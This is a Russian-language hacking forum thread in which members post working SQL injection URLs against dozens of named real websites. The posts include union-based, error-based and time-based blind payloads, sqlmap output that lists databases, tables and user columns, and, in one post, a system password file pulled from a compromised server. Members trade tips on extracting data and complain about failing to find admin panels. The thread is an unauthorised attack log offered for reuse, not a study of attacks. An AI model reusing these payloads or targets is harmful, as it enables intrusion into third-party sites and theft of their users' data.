SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    Code:
    http://www.pangea-tour.ru/cities.php?id=-201+union+select+1,database(),3,@@version,5,6,7,8,9--&Spid=45
    5.5.44-1+wheezy1+mh1-log

    u21941_8
    u21941
    u21941_2
    u21941_astra
    u21941_tsls
     
    #81 powerOfthemind, 14 Mar 2016
    Last edited by a moderator: 14 Mar 2016
  2. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    East Coast Trail | Scenic and Unique Hiking and Walking Trails in Newfoundland and Labrador, Canada – Welcome to the East Coast
    Code:
    http://eastcoasttrail.ca/trail/view.php?id=3%20/*!50000union*/%20distinct%20select%20version(),2,3,4,5,6,7,8,9--+f
    5.5.45-cll-lve
    ТИЦ10

    PR5
     
    Mansoni likes this.
  3. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Code:
     http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511 (GET)
    Parameter: liga (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: liga=2511 AND 1436=1436
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: liga=2511 AND (SELECT * FROM (SELECT(SLEEP(5)))oChU)
    ---
    back-end DBMS: MySQL 5.0.12
    
    
    Подкиньте жиров.
     
    t0ma5 likes this.
  4. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    http://www.mondanionline.com/valutazione-officine_panerai_panerai_ref__6152/1-36.php?lingua=it%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20--
    5.6.25-log
    После запроса, код остается в куках.

    Code:
    http://www.onionring.co.uk/article.asp?NID=411%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20--
    5.5.29-log

    Code:
    http://en.chinapanda.org.cn/topic.php?id=5%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),%20FLOOR(RAND(0)*2)))%20--
    5.6.27

    Code:
    http://alicekwartler.com/product-info.php?id=-1750+UnIon+selECt+1,2,3,4,5,6,@@version,8,9,10,11,12,13+--+
    5.0.96-log
     
    #84 WallHack, 25 Mar 2016
    Last edited: 26 Mar 2016
  5. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.uralopera.ru/showperson.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12 
    5.5.46-MariaDB-1~wheezy-log 3
    ТИЦ425

    Code:
    http://www.autoconsulting.ua/news.php?catid=-1 union all select version(),2,3,4,5,6,7,8 and '0'='0
    autoconsulting@localhost
    5.5.40-log
    ТИЦ325 YC(R4) PR4

    Code:
    http://wciom.ru/index.php?id=236&uid=-1 union all select 1,2,3,4,5,6,version()--
    5.5.38
    ТИЦ4300 PR6

    Code:
    http://sipaero.ru/post.php?id=-1 union all select 1,user(),database(),version(),5,6,7,8,9
    admin_sipaero@localhost admin_sipaero 5.1.73
     
    palec2006 likes this.
  6. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.affordablesound.com/productlist.php?id=version()

    Code:
    http://www.calais-shopping.com/fiche.php?id=9999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
    5.1.73-0ubuntu0.10.04.1-log в исходе

    Code:
    http://www.hotrodwelding.nl/product.php?id=9999.9' union all select 1,2,3,version(),5,6,7,8,9 and '0'='0
    5.5.22-log

    Code:
    http://www.annam.com.hk/menu-causeway-bay.php?id=-6748' UNION ALL SELECT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL-- -
    5.5.45-cll-lve
     
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    Code:
    http://www.jiteli.info/altai?fio=%F6%FC%25%27+and+adress+LIKE+%27%25%27+union+select+version%28%29,version%28%29+limit+1+--+s&adress=&searchButton=+%CD%E0%E9%F2%E8+
    
    5.5.47
     
    _________________________
  8. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.casco.com.ru/index.php?contentID=741
    ---
    Parameter: contentID (GET)
      Type: boolean-based blind
      Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: contentID=741' AND 2149=2149 AND 'bXwR'='bXwR
    
      Type: AND/OR time-based blind
      Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
      Payload: contentID=741' OR (SELECT * FROM (SELECT(SLEEP(5)))qEJY) AND 'XZHa'
    ='XZHa
    ---
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: Apache 2.2.14
    back-end DBMS: MySQL 5.0.12
    
    ............................................................................................
    Code:
    http://www.avongorge.org.uk/aboutus.php?ContentID=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
    5.0.87-b20

    Code:
    http://www.steelers.co.nz/steelers/index.php?contentid=9999.9+union+all+select+1,2,(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a),4,5,6,7,8,9,10
    '=~=5.5.34-MariaDB-cll-lve=~=1'

    Code:
    http://www.lostroveroscriollos.com/video.php?contentID=-3859 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
    ,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL-- -
    
    5.1.30

    Code:
    http://www.mkungl.com/2/d.php?contentID=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
    
    '=~=5.1.67-rel14.3=~=1'

    Code:
    http://waddleviolins.com/index.php?contentID=86' UNION ALL SELECT NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
    ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
    5.1.73-cll


    Code:
    http://www.uisp.it/torino2/index.php?contentId=18+or+1=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
    PR5 AlexaRank 100,405 
    Code:
    http://www.erpug.org/index.php?contentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14 and '0'='0
    5.5.47-MariaDB-1~wheezy
     
  9. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    www.fba-labs.com/index.php?contentid=1' union all select database(),version(),3,4 and '0'='0
    fbalabs_admin@localhost fbalabs_cms 5.5.48-cll
    
    
    http://www.strengholt.nl/musicgroup/content.php?menuid=27 or 1=-1 union all select version(),database()--
    5.5.38-0ubuntu0.14.04.1 Strbv_strnl
    
    http://www.dswbrand.com/flash_detail.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
    5.1.73-log
    
    http://iram-institute.org/EN/content-page.php?ContentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,database(),18,19,20,version(),22,23,24,25,26,27,28,29,30 and '0'='0
    5.0.45 webdb
    
    http://www.areatattoo.com/flash_detail.php?id=-1' union all select 1,2,version(),4 and '0'='0
    
    5.5.41
     
  10. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.bestrent.fi/en/book-now.php?id=9999.9 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
    5.1.65
    
    http://www.infantaria-paintball.com.br/loja/sessoes.asp?id=26'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
    5.0.45-community-nt
    
    http://www.badboysafloat.com.au/product_details.php?id=9999.9 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16
    10.0.20-MariaDB-cll-lve
    
    
    http://www.attaapparels.com/shop.php?id=9999.9 union all select 1,2,3,version(),5,6,7,8,9,10,11,12
    5.5.44-log
    
    http://www.kabelindo.co.id/readnews.php?id=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
    10.1.13-MariaDB
     
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    _ttp://taxiforsazh.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+
    5.1.71-cll-lve
     
  12. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://relax-nk.ru/rub.php?id=1 union all select @@version,2
    5.5.47
    
    http://janno.net/shop_.php?id=-1 union all select 1,@@version,3,4,5,6
    5.5.48-cll 3
    
    http://www.flundra.com/shop2.php?id=-1 union all select 1,2,@@version,4,5,6,7,8
    5.5.29-log
    
    www.powermanager.co.kr/bbs/shop_.php?cno=2
    ---
    Parameter: cno (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cno=2) AND 2160=2160 AND (1973=1973
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: cno=2) AND (SELECT * FROM (SELECT(SLEEP(5)))doLu) AND (4537=4537
    ---
    web application technology: PHP 5.3.13
    back-end DBMS: MySQL 5.0.12
    Database: powermgcok
    
    
    http://www.suriyanar.com/pay.php?Id=-1 union all select 1,@@version,3,4,5
    5.1.73-cll
    
    
    http://www.vidspoke.com/buy.php?id=-1+union+all+select(select+concat(ifnull(version(),char(32)))+)
    5.5.45-cll-lve
    
    http://depolamp.ru/buy.php?id=-1 union all select 1,@@version,3,4,5,6,7,8,9
    5.1.73
    
    http://www.zeogames.net/game.php?id=6
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=6 AND 7494=7494
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))CLTv)
    ---
    web application technology: Nginx
    back-end DBMS: MySQL 5.0.12
     
    powerOfthemind likes this.
  13. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.slavsandtatars.com/about.php?id=-1 union all select version(),2,3
    5.0.96-log
    
    
    http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union all select 1,version(),3,4,5,6
    10.1.13-MariaDB
    
    
    http://www.nbrri.gov.ng/sites/news.php?ID=2
    ---
    Parameter: ID (GET)
        Type: boolean-based blind
        Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
    clause
        Payload: ID=2 RLIKE (SELECT (CASE WHEN (3724=3724) THEN 2 ELSE 0x28 END))
    
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
    ause (EXTRACTVALUE)
        Payload: ID=2 AND EXTRACTVALUE(5424,CONCAT(0x5c,0x7162627871,(SELECT (ELT(54
    24=5424,1))),0x716b707871))
    
        Type: AND/OR time-based blind
        Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
        Payload: ID=2 AND 2237=BENCHMARK(5000000,MD5(0x62517868))
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: ID=2 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162627871,0x46487573
    62567161566d4179414257704d724d756c625169636f5542656367737266756b76504469,0x716b7
    07871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
    ---
    web application technology: Apache 2.4.18, PHP 5.5.31
    back-end DBMS: MySQL 5.1
    
    
    http://www.tidytowns.ie/interior.php?id=2
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))PeRi) AND 'kKhu'='kKhu
    ---
    back-end DBMS: MySQL 5.0.12
    
    http://www.putridflowers.com/music.php?id=(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
    5.5.43-37.2-log
     
  14. danil7493

    danil7493 Member

    Joined:
    24 Jul 2011
    Messages:
    23
    Likes Received:
    7
    Reputations:
    10
    Code:
    http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -
    5.5.34-32.0-log
    
    =================================================================================================================
    https://www.fairradio.com/catalog.php?mode=view&categoryid=214
    ---
    Parameter: categoryid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE
    ---
    web application technology: Apache, PHP 5.2.17
    back-end DBMS: MySQL 5.0.12
    available databases [2]:
    [*] fairrad_radio
    [*] information_schema
    
    =================================================================================================================
    http://www.dataapex.com/catalog.php?catCategory=1
    ---
    Parameter: catCategory (GET)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx)
    ---
    web server operating system: Linux Debian 7.0 (wheezy)
    web application technology: PHP 5.4.45, Apache 2.2.22
    back-end DBMS: MySQL 5.0.12
    
    =================================================================================================================
    http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(*),concat((select(select(select+concat(0x3d7e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
    5.5.41-0+wheezy1
    + XSS
    
    =================================================================================================================
    http://jewelfox.ru/catalog.php?catId=ard
    ---
    Parameter: catId (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: catId=ard' AND (SELECT * FROM (SELECT(SLEEP(5)))Jqzn) AND 'dkLD'='dkLD
    ---
    web application technology: PHP 5.3.29
    back-end DBMS: MySQL 5.0.12
    Database: jewelfo9_db73544m
    [32 tables]
    +-------------------+
    | arrival_list      |
    | arrival_list_lot  |
    | basket            |
    | box               |
    | business          |
    | category          |
    | defect            |
    | delivery          |
    | favorites         |
    | logistics         |
    | lots              |
    | motion            |
    | motion_logistics  |
    | motion_lot        |
    | order_tao         |
    | order_tao_comment |
    | order_tao_lots    |
    | orders            |
    | partCategory      |
    | payment           |
    | privilege         |
    | purchase          |
    | recovery          |
    | requirement       |
    | role              |
    | role_privilege    |
    | store             |
    | store_location    |
    | topMenu           |
    | user_location     |
    | user_role         |
    | users             |
    +-------------------+
    =================================================================================================================
    http://www.int.nsk.su/tech.php?id=1 union all select 1,user(),version(),4,5,database()
    logosolinf_hleb 5.6.28-76.1-log logosolinf_hleb@localhost
    =================================================================================================================
    http://www.sinoshop.ru/catalog.php?pid=1 union all select 1,2,version(),4,5,6,7,8,9
    4.0.24_Debian-10sarge3-log
    
     
    powerOfthemind likes this.
  15. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    Code:
    http://tvoy-soblazn.ru/catalog.php?cat=9&sid=120&sid=-118+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,version(),54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74--
    
    rentaproject_szn
    5.0.82-log 7
    
    
     
  16. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Code:
    http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)
    
    
    
    Parameter: category (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a774b55506a74774f78446271567a747359757950414548467768,0x71706a7171)-- -
    ---
    web application technology: PHP 5.4.16
    back-end DBMS: MySQL 5.0
    available databases [3]:
    [*] dealdb
    [*] information_schema
    [*] test
    
    
    А то все мелочь и мелочь!

    [​IMG]
     
    #96 RWD, 30 Apr 2016
    Last edited: 30 Apr 2016
    ClayFox and powerOfthemind like this.
  17. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    342
    Reputations:
    47
    RWD, раскручивайте вручную.

    Code:
    http://www.dealigg.com/index.php?page=2&category=-ApparelShoes'+and+extractvalue(1,concat(0x3a,(user())))+--+
     
  18. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Current User: root@localhost
    Code:
    http://www.lafinancepourtous.com/quiz/admin/xml.php?id=2 (GET)
    
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=2 AND 2870=2870
    
        Type: error-based
        Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
        Payload: id=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707671,(SELECT (ELT(1622=1622,1))),0x717a706a71,0x78))s), 8446744073709551610, 8446744073709551610)))
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=2 AND SLEEP(5)
    ---
    web application technology: Apache
    back-end DBMS: MySQL >= 5.5
    
    
    Current DB: lafinancepourtousquiz
    Data Base Found: information_schema
    Data Base Found: grand_quiz
    Data Base Found: lafinancepourtous
    Data Base Found: lafinancepourtousgame
    Data Base Found: lafinancepourtousquiz
    Data Base Found: mysql
    Data Base Found: performance_schema
    Data Base Found: phpmyadmin
    Data Base Found: portail
    Data Base Found: preprod
    
    # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $
    #
    root:*:0:0:Charlie &:/root:/bin/csh
    daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
    operator:*:2:5:System &:/:/usr/sbin/nologin
    bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
    tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
    kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
    games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
    news:*:8:8:News Subsystem:/:/usr/sbin/nologin
    man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
    sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
    smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
    mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
    bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
    proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
    _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
    _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
    uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
    pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
    www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
    nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
    clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
    mysql:*:88:88:MySQL Daemon:/home/mysql:/usr/sbin/nologin
    admin:*:1001:1001:User &:/home/admin:/bin/sh
    pgsql:*:70:70:PostgreSQL Daemon:/usr/local/pgsql/pgsql:/bin/sh
    spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
    vscan:*:110:110:Scanning Virus Account:/var/amavis:/bin/sh
    dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
    cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin
    mailowner:*:1003:1003:User &:/home/mailowner:/usr/sbin/nologin
    webapps:*:1004:1004:User &:/home/webapps:/sbin/nologin
    mailman:*:91:91:Mailman Owner:/home/mailman:/sbin/nologin
    nfrance:*:1006:1006:User &:/home/nfrance:/bin/sh
    mrtg:*:279:1001:MRTG daemon:/nonexistent:/sbin/nologin
    stats:*:1008:1009:User &:/home/stats:/sbin/nologin
    nagios:*:181:181:Nagios pseudo-user:/var/spool/nagios:/sbin/nologin
    dovenull:*:144:144:Dovecot login User:/var/empty:/usr/sbin/nologin
    iefp2:*:1009:1010:utilisateur:/home/users/iefp2:/bin/ftponly
    iefp3:*:1010:1011:utilisateur:/home/users/iefp3:/usr/local/bin/bash
    mail1001:*:1011:1012:utilisateur:/home/users/mail1001:/usr/sbin/nologin
    mail1005:*:1012:1013:utilisateur:/home/users/mail1005:/usr/sbin/nologin
    mail1010:*:1013:1014:utilisateur:/home/users/mail1010:/usr/sbin/nologin
    mail1015:*:1014:1015:utilisateur:/home/users/mail1015:/usr/sbin/nologin
    mail1018:*:1016:1017:utilisateur:/home/users/mail1018:/usr/sbin/nologin
    mail1020:*:1017:1018:utilisateur:/home/users/mail1020:/usr/sbin/nologin
    mail1024:*:1018:1019:utilisateur:/home/users/mail1024:/usr/sbin/nologin
    mail1026:*:1019:1020:utilisateur:/home/users/mail1026:/usr/sbin/nologin
    mail1022:*:1020:1021:utilisateur:/home/users/mail1022:/usr/sbin/nologin
    mail1029:*:1021:1022:utilisateur:/home/users/mail1029:/usr/sbin/nologin
    mail1017:*:1022:1023:utilisateur:/home/users/mail1017:/usr/sbin/nologin
    mail1025:*:1023:1024:utilisateur:/home/users/mail1025:/usr/sbin/nologin
    mail1006:*:1024:1025:utilisateur:/home/users/mail1006:/usr/sbin/nologin
    mail1003:*:1025:1026:utilisateur:/home/users/mail1003:/usr/sbin/nologin
    mail1012:*:1026:1027:utilisateur:/home/users/mail1012:/usr/sbin/nologin
    mail1027:*:1027:1028:utilisateur:/home/users/mail1027:/usr/sbin/nologin
    mail1028:*:1028:1029:utilisateur:/home/users/mail1028:/usr/sbin/nologin
    mail1002:*:1029:1030:utilisateur:/home/users/mail1002:/usr/sbin/nologin
    mail1019:*:1030:1031:utilisateur:/home/users/mail1019:/usr/sbin/nologin
    mail1030:*:1031:1032:utilisateur:/home/users/mail1030:/usr/sbin/nologin
    mail1031:*:1032:1033:utilisateur:/home/users/mail1031:/usr/sbin/nologin
    vnstat:*:284:284:vnStat Network Monitor:/nonexistent:/usr/sbin/nologin
    
    

    current user: 'atame_@localhost'
    Code:
    http://lacuerda.net:80/Enlaces/index.php?cid=9 (GET)
    Parameter: cid (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cid=9 AND 7978=7978
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: cid=9 AND SLEEP(5)
    ---
    web application technology: Apache, PHP 5.4.42
    back-end DBMS: MySQL >= 5.0
    available databases [4]:
    [*] information_schema
    [*] lc_comunidad
    [*] lc_dbase
    [*] lc_topsites
    
    
    

    Code:
    http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET)
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 5266=5266
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    ---
    web server operating system: Linux Debian 6.0 (squeeze)
    web application technology: PHP 5.3.3, Apache 2.2.16
    back-end DBMS: MySQL >= 5.0.12
    
    
     
    #98 RWD, 15 Aug 2016
    Last edited: 15 Aug 2016
  19. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.dalnoboivideo.ru/page.php?id=-118'+union+select+1,version(),3,4+--+
    версия: 5.6.28-1+wheezy1+mh2-log
    таблицы: adv,adv_places,pages,places,users,videos
    поля users: id,login,password,city,mail,ip,date_reg,priv

    админки не нашел и все что с этим связанно.((((
     
  20. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    http://www.bogatiyhohol.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+